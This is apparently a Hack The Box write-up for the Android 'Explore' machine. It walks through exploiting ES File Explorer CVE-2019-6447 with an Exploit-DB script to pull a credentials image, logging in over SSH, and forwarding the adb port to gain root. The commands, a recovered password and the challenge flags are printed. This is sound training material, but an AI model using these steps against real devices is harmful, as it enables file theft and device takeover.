Enumeration
As usual, let's start with nmap:
nmap -sV -Pn -p- 10.10.10.247
![](https://static.wixstatic.com/media/bc0a6b_95ed07763f8a41b69414b152a15864df~mv2.png/v1/fill/w_980,h_260,al_c,q_85,usm_0.66_1.00_0.01,enc_auto/bc0a6b_95ed07763f8a41b69414b152a15864df~mv2.png)
I googled the following:
port 5555 android --> adb (android debug bridge)
port 5977 android --> found out there is android vulnerability in ES file explorer - CVE-2019-6447. Basically this vulnerability allow attackers on the same network to execute applications and read files on the android!
From your attackers' machine do the following:
Go to exploit database https://www.exploit-db.com/
Click on Search EDB
and type 2019-6447 in the CVE field
Click on the exploit
Download the exploit
Go to your Downloads folder:
cd Downloads
ls
![](https://static.wixstatic.com/media/bc0a6b_c74ba643c4a24a6cbd8c853fb3af8441~mv2.png/v1/fill/w_980,h_245,al_c,q_85,usm_0.66_1.00_0.01,enc_auto/bc0a6b_c74ba643c4a24a6cbd8c853fb3af8441~mv2.png)
Let's try to run this exploit using:
python3 50070.py
![](https://static.wixstatic.com/media/bc0a6b_069af2684b5f43078c9f28a6d78310e9~mv2.png/v1/fill/w_980,h_98,al_c,q_85,usm_0.66_1.00_0.01,enc_auto/bc0a6b_069af2684b5f43078c9f28a6d78310e9~mv2.png)
Looks like we need to add a command followed by the IP. If we go back to the exploit on the exploit-db website, it tells us we can use the command listPics to list all the pictures on the android so let's try that:
python3 50070.py listPics 10.10.10.247
![](https://static.wixstatic.com/media/bc0a6b_3922feaa136e4e7886fceab3adfc9cd6~mv2.png/v1/fill/w_829,h_615,al_c,q_90,enc_auto/bc0a6b_3922feaa136e4e7886fceab3adfc9cd6~mv2.png)
Looks like there is an interesting picture called creds.jpg
Let's try to get this file using getFile:
python3 50070.py getFile 10.10.10.247 /storage/emulated/0/DCIM/creds.jpg
![](https://static.wixstatic.com/media/bc0a6b_3ce1bdbd7e16442b8be6fc3c0e3151ab~mv2.png/v1/fill/w_980,h_229,al_c,q_85,usm_0.66_1.00_0.01,enc_auto/bc0a6b_3ce1bdbd7e16442b8be6fc3c0e3151ab~mv2.png)
The file has been downloaded on our machine as out.dat, let's check it out:
![](https://static.wixstatic.com/media/bc0a6b_9431c50fd34946e99ae7a04aa2cabceb~mv2.png/v1/fill/w_980,h_480,al_c,q_90,usm_0.66_1.00_0.01,enc_auto/bc0a6b_9431c50fd34946e99ae7a04aa2cabceb~mv2.png)
When we open the file we see the following:
![](https://static.wixstatic.com/media/bc0a6b_38ea03a347b2487bb70e13185b90cb44~mv2.png/v1/fill/w_550,h_170,al_c,q_85,enc_auto/bc0a6b_38ea03a347b2487bb70e13185b90cb44~mv2.png)
Looks like a password for username kristi:
Kr1sT!5h@Rp3xPl0r3!
We can see from the nmap that port 2222 is open, which is ssh. So let's try to ssh using these credentials:
ssh kristi@10.10.10.247 -p 2222
![](https://static.wixstatic.com/media/bc0a6b_304bf84c47eb42998d7bb5e2c521a765~mv2.png/v1/fill/w_980,h_125,al_c,q_85,usm_0.66_1.00_0.01,enc_auto/bc0a6b_304bf84c47eb42998d7bb5e2c521a765~mv2.png)
Type yes and press enter
![](https://static.wixstatic.com/media/bc0a6b_b5a6971ea0994017a5380430184a5831~mv2.png/v1/fill/w_980,h_217,al_c,q_85,usm_0.66_1.00_0.01,enc_auto/bc0a6b_b5a6971ea0994017a5380430184a5831~mv2.png)
enter the password we just found
Kr1sT!5h@Rp3xPl0r3!
![](https://static.wixstatic.com/media/bc0a6b_346228c56b064f74b35487fedd9acfe2~mv2.png/v1/fill/w_980,h_210,al_c,q_85,usm_0.66_1.00_0.01,enc_auto/bc0a6b_346228c56b064f74b35487fedd9acfe2~mv2.png)
We are in!
id
![](https://static.wixstatic.com/media/bc0a6b_6144240a154c490a8a54d57ed13de616~mv2.png/v1/fill/w_980,h_75,al_c,q_85,usm_0.66_1.00_0.01,enc_auto/bc0a6b_6144240a154c490a8a54d57ed13de616~mv2.png)
ls
![](https://static.wixstatic.com/media/bc0a6b_c2e33a0d44a5452cb7e939a3e809b0bb~mv2.png/v1/fill/w_980,h_522,al_c,q_90,usm_0.66_1.00_0.01,enc_auto/bc0a6b_c2e33a0d44a5452cb7e939a3e809b0bb~mv2.png)
cd sdcard
ls
![](https://static.wixstatic.com/media/bc0a6b_ec5941623d5b49e9a8c62ae8699a7d07~mv2.png/v1/fill/w_980,h_171,al_c,q_85,usm_0.66_1.00_0.01,enc_auto/bc0a6b_ec5941623d5b49e9a8c62ae8699a7d07~mv2.png)
cat user.txt
![](https://static.wixstatic.com/media/bc0a6b_80a3bdb488d0461a8c039212a9dceb40~mv2.png/v1/fill/w_510,h_72,al_c,q_85,enc_auto/bc0a6b_80a3bdb488d0461a8c039212a9dceb40~mv2.png)
f32017174c7c7e8f50c6da52891ae250
Congratulations! You got the user flag!
cd ..
ls
![](https://static.wixstatic.com/media/bc0a6b_39d9116f93784919a8f0982798cec7ee~mv2.png/v1/fill/w_980,h_495,al_c,q_90,usm_0.66_1.00_0.01,enc_auto/bc0a6b_39d9116f93784919a8f0982798cec7ee~mv2.png)
Let's find out on which port the android is listening by typing:
netstat -tulpn | grep LISTEN
![](https://static.wixstatic.com/media/bc0a6b_301e9d4ad46a4c7984e502672cef9d45~mv2.png/v1/fill/w_980,h_160,al_c,q_85,usm_0.66_1.00_0.01,enc_auto/bc0a6b_301e9d4ad46a4c7984e502672cef9d45~mv2.png)
We can see port 5555 is listening.
Port forwarding
What is local port forwarding:
Local port forwarding is configured using the -L option:
ssh -L 5555:machine2:5555 machine1
This opens a connection on the machine1 and forwards any connection to port 5555 on machine1 to port 5555 on machine2
For our case let's use it and type:
ssh -L 5555:localhost:5555 kristi@IP -p 2222
This opens a connection to htb target machine (explore machine), and forwards any connection to port 5555 on the machine to port 5555 on my localhost (VM)
We know that our target (htb machine) is listening on port 5555 (netstat told us)
Open a new command prompt on your VM
ssh -L 5555:localhost:5555 kristi@10.10.10.247 -p 2222
![](https://static.wixstatic.com/media/bc0a6b_0ed4e51de6c64c459914c0116459fcd6~mv2.png/v1/fill/w_980,h_169,al_c,q_85,usm_0.66_1.00_0.01,enc_auto/bc0a6b_0ed4e51de6c64c459914c0116459fcd6~mv2.png)
Enter the password we found earlier
Kr1sT!5h@Rp3xPl0r3!
![](https://static.wixstatic.com/media/bc0a6b_807a497b10b34073a46b035781630689~mv2.png/v1/fill/w_980,h_173,al_c,q_85,usm_0.66_1.00_0.01,enc_auto/bc0a6b_807a497b10b34073a46b035781630689~mv2.png)
adb
ADB - Android Debug Bridge is a command line tool that allow you to communicate with an android device. It is used by developers mainly to install or debug apps, and it also comes with a unix shell that can be used to run several commands on the device.
An Android device emulator is just a virtual device that runs on your computer that allow you to develop and test your android app without using a physical android device.
Open a new command prompt on your VM
sudo apt install adb
Press Y to continue
![](https://static.wixstatic.com/media/bc0a6b_7fefae6df6a14cf5bf3a58d8ebe9cb94~mv2.png/v1/fill/w_980,h_520,al_c,q_90,usm_0.66_1.00_0.01,enc_auto/bc0a6b_7fefae6df6a14cf5bf3a58d8ebe9cb94~mv2.png)
sudo apt-get update
![](https://static.wixstatic.com/media/bc0a6b_a2ee4f81a26a401c895dcea3e83453bd~mv2.png/v1/fill/w_980,h_347,al_c,q_85,usm_0.66_1.00_0.01,enc_auto/bc0a6b_a2ee4f81a26a401c895dcea3e83453bd~mv2.png)
sudo apt install adb
press Y to continue.
This time it worked, we have installed adb successfully.
adb devices
![](https://static.wixstatic.com/media/bc0a6b_34f87726c5774d26969eeb0cc0256a6e~mv2.png/v1/fill/w_952,h_223,al_c,q_85,enc_auto/bc0a6b_34f87726c5774d26969eeb0cc0256a6e~mv2.png)
adb connect localhost:5555
![](https://static.wixstatic.com/media/bc0a6b_f072dcf2789b4839b939faaf624219a3~mv2.png/v1/fill/w_741,h_184,al_c,q_85,enc_auto/bc0a6b_f072dcf2789b4839b939faaf624219a3~mv2.png)
adb devices
![](https://static.wixstatic.com/media/bc0a6b_163507b3826847debe19d2e6d6fab8ef~mv2.png/v1/fill/w_859,h_264,al_c,q_85,enc_auto/bc0a6b_163507b3826847debe19d2e6d6fab8ef~mv2.png)
adb shell
adb localhost shell
adb -s localhost shell
![](https://static.wixstatic.com/media/bc0a6b_856987acabd941b9b52e42756c6b1c65~mv2.png/v1/fill/w_712,h_322,al_c,q_85,enc_auto/bc0a6b_856987acabd941b9b52e42756c6b1c65~mv2.png)
whoami
![](https://static.wixstatic.com/media/bc0a6b_d50a8d56dc8249dd9281406d0587a185~mv2.png/v1/fill/w_761,h_181,al_c,q_85,enc_auto/bc0a6b_d50a8d56dc8249dd9281406d0587a185~mv2.png)
su
The su command switches to the super user – or root user
![](https://static.wixstatic.com/media/bc0a6b_34b51110dd4049018a9419e20b84f1cb~mv2.png/v1/fill/w_516,h_95,al_c,q_85,enc_auto/bc0a6b_34b51110dd4049018a9419e20b84f1cb~mv2.png)
whoami
![](https://static.wixstatic.com/media/bc0a6b_5d0ffc60af06404586186bd777b0b13a~mv2.png/v1/fill/w_362,h_119,al_c,q_85,enc_auto/bc0a6b_5d0ffc60af06404586186bd777b0b13a~mv2.png)
we are now root!
ls
![](https://static.wixstatic.com/media/bc0a6b_0e66922e60564835bd3e0338511ad977~mv2.png/v1/fill/w_980,h_494,al_c,q_90,usm_0.66_1.00_0.01,enc_auto/bc0a6b_0e66922e60564835bd3e0338511ad977~mv2.png)
cd data
ls
![](https://static.wixstatic.com/media/bc0a6b_86f28e99b5f74573a77cd8f01958e7e6~mv2.png/v1/fill/w_980,h_312,al_c,q_85,usm_0.66_1.00_0.01,enc_auto/bc0a6b_86f28e99b5f74573a77cd8f01958e7e6~mv2.png)
cat root.txt
![](https://static.wixstatic.com/media/bc0a6b_e2ed75be8dc84b07b849610492c6cd25~mv2.png/v1/fill/w_496,h_124,al_c,q_85,enc_auto/bc0a6b_e2ed75be8dc84b07b849610492c6cd25~mv2.png)
f04fc82b6d49b41c9b08982be59338c5
Congratulations! You got the root flag!
Comments